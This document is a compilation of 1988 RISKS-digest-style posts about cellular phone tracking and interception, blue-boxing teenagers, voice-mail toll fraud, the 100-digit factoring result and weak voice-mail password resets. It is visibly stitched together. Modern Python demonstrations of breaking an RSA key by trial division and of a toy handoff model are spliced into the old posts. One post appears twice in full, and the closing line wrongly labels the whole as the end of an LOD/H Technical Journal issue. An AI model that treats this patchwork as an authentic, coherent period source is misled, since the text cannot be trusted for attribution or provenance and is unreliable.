You would be surprised -- or maybe you wouldn't -- at the numerous scams and
[........] stories people tell the phone company to get the non-pub number of
someone else. Fortunately, Bell takes a great deal of pride in their efforts to
protect the privacy of their subscribers.

Patrick Townson, The Portal System(TM)
uunet!portal!cup.portal.com!Patrick_A_Townson

-----------------------

Date: Tue, 4 Oct 88 18:01:58 CDT
From: linnig@skvax1.csc.ti.com
Subject: More on monitoring Cellular Phones

Alan Kaminsky (ark%hoder@CS.RIT.EDU) writes:

> When a phone detects a paging message with
> its own address, it broadcasts a page response message. This response is
> received by all the cells in the system, and the signal strength is measured.
> The cell receiving the strongest response is assumed to be the cell in which
> the phone is located, an unused frequency in that cell is assigned, and the
> phone call is switched to a transceiver in that cell.

Ah, but could the phone company send out a page without a following
"ring them" message? If they could, then they could periodically
poll your position, and your faithful cellular phone would report
it without your knowledge.

> As for business competitors monitoring calls you place on your cellular
> telephone, to find out your clients' phone numbers: This is perfectly
> possible.... One hopes the FCC, police, etc.
> would prevent anyone from offering such a product commercially.

Well, the communication privacy act recently passed prevents you from
intercepting the audio side of the cellular phone conversation, but I doubt
if it prevents you from picking up the dialing info. I think such a device
might be considered in the same class as a "pen register." Pen registers
record the numbers called on a telephone circuit. I believe the Supreme
Court doesn't even require a search warrant to place a pen register on a
phone. It may be quite legal to record the phone numbers dialed by a
cellular phone. Someone with a law background want to comment?

Mike Linnig,
Texas Instruments

------------------------------

Date: Fri, 7 Oct 88 09:00:08 edt
From: Henry Cox <cox@spock.ee.mcgill.ca>
Subject: Reach Out and Touch Someone...

TEENS RUN UP TELEPHONE BILL OF $650,000

[From the Montreal Gazette, 7 October 1988]

LAS VEGAS (AP) - Ten teenage hackers may have run up $650 000 in
telephone calls by tricking phone company computers, and their parents
could be liable for the tab, authorities said.

"They reached out, all right," assistant U.S. Attorney Russel Mayer said
of the hackers, nine 14-year-olds and one 17-year-old. "They reached
out and touched the world."

Tom Spurlock, resident agent in charge of the Las Vegas Secret Service
office, said the teenagers engaged in "blue boxing," a technique that
enabled them to talk to fellow hackers throughout Europe.

"They were calling numbers that were in the ATT system, and their
(computer) programs would allow them to 'jump' ATT's circuits, allowing
them to call anywhere in the world."

The expensive shenanigans came to light when local phone company
officials discovered unusual activity on nine Las Vegas phone lines,
Spurlock said. He said federal agents obtained warrants and searched
the nine homes.

The teenagers weren't taken into custody or charged, but their computers
were seized.

Henry Cox

------------------------------

Date: Fri, 07 Oct 88 13:35:03 -0400
From: davis@community-chest.mitre.org
Subject: Computer Security and Voice Mail

From the Oct 6 Washington Post.
From a news item "Hackers Find New Way to Tap Long-Distance Phone Lines".

Zotos International Co. received two consecutive $75,000 phone bills,
due to use of their automated answering system by hackers.

Zotos' switchboard automatically routes incoming calls to the proper
department. Hackers found a way to circumvent the system to place outgoing
long-distance calls, in some cases to Pakistan and Senegal. In this case the
calls were traced to Pakistani businesses in New York. However, police
officials told Zotos that they must catch the hackers in the act in order to
prosecute. The telephone company informed Zotos' management to pay the bills,
and collect from the suspected hackers via the civil courts.

In the same article, a related Los Angeles case of misuse of an electronic
switchboard system by outsiders described 'capture' of 200 of a company's
password-secured voice mail accounts. Outsiders, in this case a dope ring and
a prostitution ring, gained access by guessing the 4-digit passwords and
changing them. The hackers backed off only when 'Federal authorities' began
tracing calls.

The article quotes security experts as recommending systems including several
access codes. Also, major companies are adding software to detect changes in
calling patterns.

------------------------------

Date: 6 Oct 88 09:45
From: plouff%nac.DEC@decwrl.dec.com (Wes Plouff)
Subject: Re: Risks of Cellular Phones

Recent writers to RISKS, starting with Chuck Weinstock in issue 7.57, have
focused on the risk of vehicle location by cellular telephone systems. In my
opinion, they exaggerate this risk and underestimate another risk of mobile
phones, the complete lack of privacy in radio transmissions.

Roughly 10 years ago I designed vehicle location controller hardware and
firmware used in the Washington-Baltimore cellular demonstration system.
That system led directly to products sold at least through the first
waves of cellular system construction a few years ago.

Since cellular base stations have intentionally limited geographic
coverage, vehicle location is a requirement. This limitation is used to
conserve radio channels; one cell's frequencies can be re-used by others
far enough away in the same metropolitan area. The cell system must
determine which cell a mobile user is located in when he begins a call,
and when during a conversation a vehicle crosses from one cell into
another. Cells are set up perhaps 3 to 20 miles in diameter and range
from circular to very irregular shapes. Cellular phone systems are
designed with ample margins so that statistically very few calls will be
lost or have degraded voice quality.

Making this system work does not require anything so fancy as
triangulation. Vehicle location needs to be only good enough to keep
signal quality acceptably high. John Gilmore explained in RISKS 7.58
how this works while the mobile phone is on-hook. During a
conversation, the base station periodically measures the signal strength
of an active mobile in its cell. When the signal strength goes below a
threshold, adjacent cells measure the mobile's signal strength. This
'handoff trial' procedure requires no interaction with the mobile. If
the mobile was stronger by some margin in an adjacent cell, both the mobile
phone and the cellular exchange switch are ordered to switch to a channel and
corresponding phone line in the new cell. Since base stations commonly use
directional antennas to cover a full circle, mobiles could be reliably located
in one third of the cell area at best. Distance-measuring techniques advocated
by AT&T were not adopted because the added cost was too high for the modest
performance gain.

Certainly a cellular phone system can locate a mobile at any time, and always
locates a mobile during a conversation. But the information is not
fine-grained enough to implement some of the schemes imagined by previous
writers.

A more important risk is the risk of conversations being intercepted. The
public airwaves are simply that: public. Scanner radios can easily be found or
modified to cover the cellular band, and listeners will tolerate lower signal
quality than cellular providers, hence one scanner can listen to cell base
stations over a wide area. The communications privacy law is no shield because
listeners are undetectable. To bring this back to risks of computers,
automated monitoring and recording of selected mobile phones is probably beyond
the reach of the average computer hobbyist, but easily feasible for a
commercial or government organization using no part of the infrastructure
whatever, just the control messages available on the air.

Wes Plouff, Digital Equipment Corp, Littleton, Mass.
plouff%nac.dec@decwrl.dec.com

------------------------------

Date: Wed, 12 Oct 88 20:34:01 -0700
From: davy@riacs.edu <David A. Curry>
Subject: 100 digit primes no longer safe in crypto

Taken from the San Jose Mercury News, Oct. 12, 1988, Page 8A:

Computers able to make light work of cracking code (Los Angeles Times)

Some secret codes intended to restrict access to military secrets and Swiss
bank accounts may not be as safe as had been presumed, a team of computer
experts demonstrated Tuesday.

The team succeeded in doing what security experts thought could not be done:
using ordinary computers to break down a 100-digit number into the components
that produce it when multiplied together.

That process, called factoring, holds the key to many security codes.

Before Tuesday, experts had believed that if the number was large enough -
up to 100 digits - its factoring would take about 10 months with a Cray
supercomputer, one of the most powerful computers in the world.

But computer experts across the United States, Europe and Australia solved
the problem more quickly by using 400 processors simultaneously. They linked
their computers electronically and factored a 100-digit number in just 26 days.

The number has two factors, one 41 digits long and the other 60 digits long.

And that, according to Arjen Lenstra, professor of computer science at the
University of Chicago, should be quite sobering to experts who believe they
are secure with codes based on numbers that large. Lenstra headed the project,
along with Mark S. Manasse of the Digital Equipment Corp.'s Systems Research
Center in Palo Alto.

[ quotes from experts ]

Rodney M. Goodman, associate professor of electrical engineering and an
expert on cryptography at the California Institute of Technology in Pasadena,
described the achievement as "significant," because it means that some systems
may not be as secure as had been thought. But he said it did not mean that
security experts around the world would have to rebuild their systems.

"All the cryptographers will do is increase the length of the number by a
few more digits," he said, "because the problem gets exponentially worse as
you increase the size of the number." A larger number is more cumbersome, and
cryptographers had tried to keep the number as small as possible.

[ explanation of the idea behind using large numbers with
prime factors in cryptography ]

Last year, Lenstra decided to tackle the problem on "a small scale, just to
see if he could do it," according to Larry Arbeiter, spokesman for the
University of Chicago. "It was a pure science type of effort."

Several months ago, Lenstra presented his idea to Manasse, a computer
research scientist with Digital. Manasse became so intrigued with the problem
that his company agreed to fund much of the cost, including the use of more
than 300 computer processors at the Palo Alto company during off-duty hours.
The company manufactures DEC computers.

"I was interested in the general problem of taking a program and breaking it
up into small pieces" so that many could work simultaneously toward the
solution, Manasse said.

Other computer enthusiasts from the "factoring community" clamored aboard
and this fall more than 400 computers around the globe were ready to give it a
try.

The computers ranged in size from microcomputers to a Cray supercomputer,
but even personal computers with large memories could have been used, Lenstra
said. Each of the participating computers was given a different part of the
problem to solve, and success came early Tuesday morning.
|
||
|
||
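The size argument in Goodman's quote above, as an added example that is not part of the article or of the Lenstra/Manasse project: a textbook RSA key built from two small constructed primes (10007 and 10009), then broken by factoring the modulus with trial division. Trial division is the crudest method and far slower than the sieve-style algorithm the 400-processor effort used, but its step counter shows plainly why "a few more digits" on the modulus multiplies the attacker's work.

```python
# Added example (not from the article): a textbook RSA key built from two
# small constructed primes, then broken by factoring the modulus with
# trial division.  The step counter shows how the work grows with n.
from math import gcd, isqrt


def trial_factor(n):
    """Return (p, q, steps) with p * q == n and p <= q, by trial division.

    steps counts the candidate divisors tried.  For n = p * q with p the
    smaller prime that is about p / 2, i.e. roughly sqrt(n) / 2 when the
    primes are of similar size, so every extra digit of n costs more
    than every previous one did.
    """
    steps = 0
    d = 2
    while d <= isqrt(n):
        steps += 1
        if n % d == 0:
            return d, n // d, steps
        d = 3 if d == 2 else d + 2      # after 2, only odd candidates
    return 1, n, steps                   # n itself is prime


def make_keypair(p, q, e=65537):
    """Textbook RSA: public (n, e), private (n, d) with e * d == 1 mod phi."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime with phi(n)")
    d = pow(e, -1, phi)                  # modular inverse (Python 3.8+)
    return (n, e), (n, d)


def recover_private_key(n, e):
    """What anyone who can factor n obtains: d, plus the work it took."""
    p, q, steps = trial_factor(n)
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi), steps


def demo(p=10007, q=10009, message=42):
    """Build a key, round-trip a message, then recover d by factoring n.

    Returns (n, private_key_recovered, steps).
    """
    (n, e), (_, d) = make_keypair(p, q)
    c = pow(message, e, n)                     # encrypt with public key
    assert pow(c, d, n) == message             # decrypt with real private key
    d_recovered, steps = recover_private_key(n, e)
    assert pow(c, d_recovered, n) == message   # factoring gave the same power
    return n, d == d_recovered, steps


if __name__ == "__main__":
    n, broken, steps = demo()
    print(f"n={n}: private key recovered={broken} after {steps} divisions")
    # constructed comparison: 2-digit primes versus 5-digit primes
    print("steps, 2-digit primes:", trial_factor(53 * 59)[2])
    print("steps, 5-digit primes:", trial_factor(10007 * 10009)[2])
```

The two step counts at the end (27 divisions for a 4-digit modulus, 5004 for a 9-digit one) are the whole lesson: the defender's cost of a longer modulus is linear in the extra digits, the attacker's is not.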
------------------------------

Date: 12 Oct 88 19:14:22 GMT
From: spaf@purdue.edu (Gene Spafford)
Subject: NSFnet Backbone Shot

The following mail was forwarded to me a few minutes ago. This refers to
the MCI fiber used to carry the NSFnet backbone. No wonder some of my mail
has disappeared recently! [From: field inadvertently deleted?]

=> Date: Wed, 12 Oct 88 12:47:00 EDT
=> To: watchdogs@um.cc.umich.edu, ie@merit.edu
=> Subject: A bit of trivia
=>
=> The fiber that goes from Houston to Pittsburgh was broken due
=> to a gun blast....that is right, a gun blast.
=> Somewhere in the swamps of the Bayou (between Alabama and New Orleans)
=> the fiber cables are suspended above the swamps and a good ol'
=> boy was apparently target practicing on the cable.
=>
=> Traffic has been rerouted and when the investigation has taken place
=> and the cable fixed we will be put back on the original circuit.

Gene Spafford
NSF/Purdue/U of Florida Software Engineering Research Center,
Dept. of Computer Sciences, Purdue University, W. Lafayette IN 47907-2004
Internet: spaf@cs.purdue.edu uucp: ...!$decwrl,gatech,ucbvax!purdue!spaf

------------------------------

Date: Tue, 11 Oct 88 00:14 MDT
From: MCCLELLAND_G%CUBLDR@VAXF.COLORADO.EDU
Subject: Intersection of ANI and Voice Mail Risks

Recent reports in RISKS of nefarious deeds committed by hackers who
entered a system via voice mail prompted me to inquire about the voice mail
security of my university's system. A year ago the U bought its own fancy
switch for on-campus communications. Some of the goodies include voice
mail and ANI. I tried the voice mail once but since I much prefer e-mail
I long ago forgot my voice mail password (yep, only 4 digits if the
hackers want to start guessing). I called the telecommunications office
to determine where I needed to go in person and with how many photo ID's
to get my voice mail password. Even though I hadn't identified myself,
the clerk said, "Oh that won't be necessary, Mr. McClelland, I'll just
change your password back to the default password and you can then change
it to whatever you want." I said, "But how do you know that I'm
McClelland?" He replies, "Because it shows on the digital display on my
phone both the phone number and name of the caller." [Most phones are in
private offices so a unique name can be attached to each number.] I tried
to explain that all he really knew was that I was someone calling from the
phone in McClelland's office and that I could be the janitor, a grad
student, or almost anyone. But security wasn't his problem so he wasn't
very concerned. I was afraid to ask how many folks never bother to change
their default password. As I was about to hang up, he said, "By the way, if
you check your voice mail from your own extension you don't even need to enter
your password." I said, "Thanks, that's reassuring" but I don't think he
caught the sarcasm.

Gary McClelland

------------------------------

Date: 6 Oct 88 09:45
From: plouff%nac.DEC@decwrl.dec.com (Wes Plouff)
Subject: Re: Risks of Cellular Phones

Recent writers to RISKS, starting with Chuck Weinstock in issue 7.57, have
focused on the risk of vehicle location by cellular telephone systems. In my
opinion, they exaggerate this risk and underestimate another risk of mobile
phones, the complete lack of privacy in radio transmissions.

Roughly 10 years ago I designed vehicle location controller hardware and
firmware used in the Washington-Baltimore cellular demonstration system.
That system led directly to products sold at least through the first
waves of cellular system construction a few years ago.

Since cellular base stations have intentionally limited geographic coverage,
vehicle location is a requirement. This limitation is used to conserve radio
channels; one cell's frequencies can be re-used by others far enough away in
the same metropolitan area. The cell system must determine which cell a mobile
user is located in when he begins a call, and when during a conversation a
vehicle crosses from one cell into another. Cells are set up perhaps 3 to 20
miles in diameter and range from circular to very irregular shapes. Cellular
phone systems are designed with ample margins so that statistically very few
calls will be lost or have degraded voice quality.

Making this system work does not require anything so fancy as
triangulation. Vehicle location needs to be only good enough to keep
signal quality acceptably high. John Gilmore explained in RISKS 7.58
how this works while the mobile phone is on-hook. During a
conversation, the base station periodically measures the signal strength
of an active mobile in its cell. When the signal strength goes below a
threshold, adjacent cells measure the mobile's signal strength. This
'handoff trial' procedure requires no interaction with the mobile. If
the mobile was stronger by some margin in an adjacent cell, both the mobile
phone and the cellular exchange switch are ordered to switch to a channel and
corresponding phone line in the new cell. Since base stations commonly use
directional antennas to cover a full circle, mobiles could be reliably located
in one third of the cell area at best. Distance-measuring techniques advocated
by AT&T were not adopted because the added cost was too high for the modest
performance gain.

Certainly a cellular phone system can locate a mobile at any time, and always
locates a mobile during a conversation. But the information is not
fine-grained enough to implement some of the schemes imagined by previous
writers.

A more important risk is the risk of conversations being intercepted. The
public airwaves are simply that: public. Scanner radios can easily be found or
modified to cover the cellular band, and listeners will tolerate lower signal
quality than cellular providers, hence one scanner can listen to cell base
stations over a wide area. The communications privacy law is no shield because
listeners are undetectable. To bring this back to risks of computers,
automated monitoring and recording of selected mobile phones is probably beyond
the reach of the average computer hobbyist, but easily feasible for a
commercial or government organization using no part of the infrastructure
whatever, just the control messages available on the air.

Wes Plouff, Digital Equipment Corp, Littleton, Mass.
plouff%nac.dec@decwrl.dec.com

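The 'handoff trial' procedure Plouff describes, as an added toy model that is not code from his post or from any real cellular system: three base stations at constructed positions, a simple 20*log10 distance law standing in for real propagation, and assumed values for the mobile's transmit power, the trial threshold and the handoff margin. Each station is split into three 120-degree antenna faces, so the most the network ever records about a mobile is which face of which cell is carrying it, which is the point about granularity made in the post.

```python
# Added example (not from the post or any real cellular system): a toy
# model of the signal-strength "handoff trial" with three-sector base
# stations.  All positions, powers and thresholds below are constructed.
from collections import namedtuple
from math import atan2, degrees, hypot, log10

Cell = namedtuple("Cell", "name x y")   # base station position in km

TX_POWER_DBM = 30.0      # assumed mobile transmit power
THRESHOLD_DBM = 15.0     # serving-cell level below which a trial is run
MARGIN_DB = 6.0          # a neighbour must beat the serving cell by this much


def rssi_dbm(cell, mx, my):
    """Level the base station hears: a simple 20*log10 distance law."""
    dist_km = max(hypot(mx - cell.x, my - cell.y), 0.01)
    return TX_POWER_DBM - 20 * log10(dist_km)


def sector(cell, mx, my):
    """Which of three 120-degree antenna faces hears the mobile (0, 1, 2)."""
    bearing = degrees(atan2(my - cell.y, mx - cell.x)) % 360
    return int(bearing // 120)


def handoff_trial(serving, cells, mx, my):
    """Return the cell that carries the call after one measurement cycle.

    Only the serving station measures the mobile unless its level has
    dropped below THRESHOLD_DBM; then the neighbours measure too, and the
    call moves only to a neighbour stronger by MARGIN_DB.  Nothing is ever
    asked of the mobile itself.
    """
    serving_level = rssi_dbm(serving, mx, my)
    if serving_level >= THRESHOLD_DBM:
        return serving
    best_level, best = max(
        (rssi_dbm(c, mx, my), c) for c in cells if c is not serving
    )
    if best_level > serving_level + MARGIN_DB:
        return best
    return serving


def track(cells, path):
    """Follow a mobile along a path; return what the network learns."""
    serving = cells[0]          # call set up in the first cell
    learned = []
    for mx, my in path:
        serving = handoff_trial(serving, cells, mx, my)
        learned.append((serving.name, sector(serving, mx, my)))
    return learned


if __name__ == "__main__":
    cells = [Cell("A", 0.0, 0.0), Cell("B", 10.0, 0.0), Cell("C", 5.0, 8.0)]
    path = [(1, 0), (4, 0), (6, 0), (9, 0), (9, 4)]   # constructed drive
    for point, info in zip(path, track(cells, path)):
        print(point, "-> cell %s, sector %d" % info)
```

Running it shows the mobile sitting in sector 0 of cell A until it is nearly at cell B, even though it has long since passed the midpoint: the trial only fires below threshold and only moves the call when a neighbour wins by the margin, so the location record lags and is never finer than one antenna face.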
------------------------------

Date: 28 Sep 88 10:10:47 +0100 (Wednesday)
From: Peter Robinson <pr@computer-lab.cambridge.ac.uk@NSS.Cs.Ucl.AC.UK>
Subject: Re: Risks of cellular telephones

As a radio amateur, I have always been taught that using mobile transmitters
near petrol stations is bad form - the radiation from the transmitter can
induce currents in nearby metalwork and perhaps cause a spark. The thought of
a cellular telephone being able to transmit without the operator's consent (in
response to a paging call) is, therefore, slightly RISKy.

This could even get worse as technology progresses. As the sunspot cycle
advances, it seems plausible that transmissions will carry further and
interfere with those in nearby cells (not the adjacent ones, they usually have
distinct frequencies). Before long the manufacturers will introduce adaptive
control where the transmitter power is adjusted dynamically to compensate for
variations in the signal path between the mobile and base stations. So then
when you pull into a petrol station and receive a call, the system will notice
that all the surrounding metal is impairing your signal and will increase the
transmitter power accordingly...

Incidentally, I am not sure what power these radios use, but I would be
slightly nervous about using a hand-held telephone with the antenna anywhere
near my eyes if it is more than a few Watts.

------------------------------

Date: Sat, 8 Oct 88 15:59:56 MET
From: "Walter Doerr" <wd@dg2kk.UUCP>
Subject: Risks of cellular phones

Chuck Weinstock <weinstoc@SEI.CMU.EDU> writes in RISKS 7.57:

> Subject: Risks of Cellular Phones?
>
> While discussing radio triangulation last night, the question came up:
> If I dial a phone number attached to a cellular phone, how does the
> cellular system know which cell should send the ring signal to the
> phone? Is it a system wide broadcast, or does the cellular phone
> periodically broadcast a "here I am" signal?

In the 'C-Net' here in Germany, all mobile phones send a "here I am" signal
whenever they move to a new cell. This information (the cell where the phone
can be reached) is stored in the database of the phone's "home" base. Calls to
mobile phones are routed to a computer in Frankfurt which contacts the home
base computer (based on the first few digits of the mobile phone number), which,
in turn, knows the cell the phone is currently in.

> If the latter, a less than benevolent government (or phone company for
> that matter) could use that information to track its citizens' cars'
> whereabouts.

According to an article in an electronics magazine, the German PTT was
approached by a police agency, who expressed interest in the data stored in the
network's computers. The article quotes a Siemens mobile telephone specialist
as saying that it isn't possible to pinpoint the current location of a mobile
phone because:

- the phone must be switched on for the network to recognize it
- the cells use omnidirectional antennas, so it isn't possible
  to determine the direction from where the mobile phone's signal came.

While this is true, it is certainly possible to determine the location of a
phone with an accuracy of a few miles (the size of the cell the phone is in)
without using any additional direction finding methods (radio triangulation).

Walter Doerr

-------------------------------------------------------------------------------
End of the LOD/H Technical Journal #3
-------------------------------------------------------------------------------
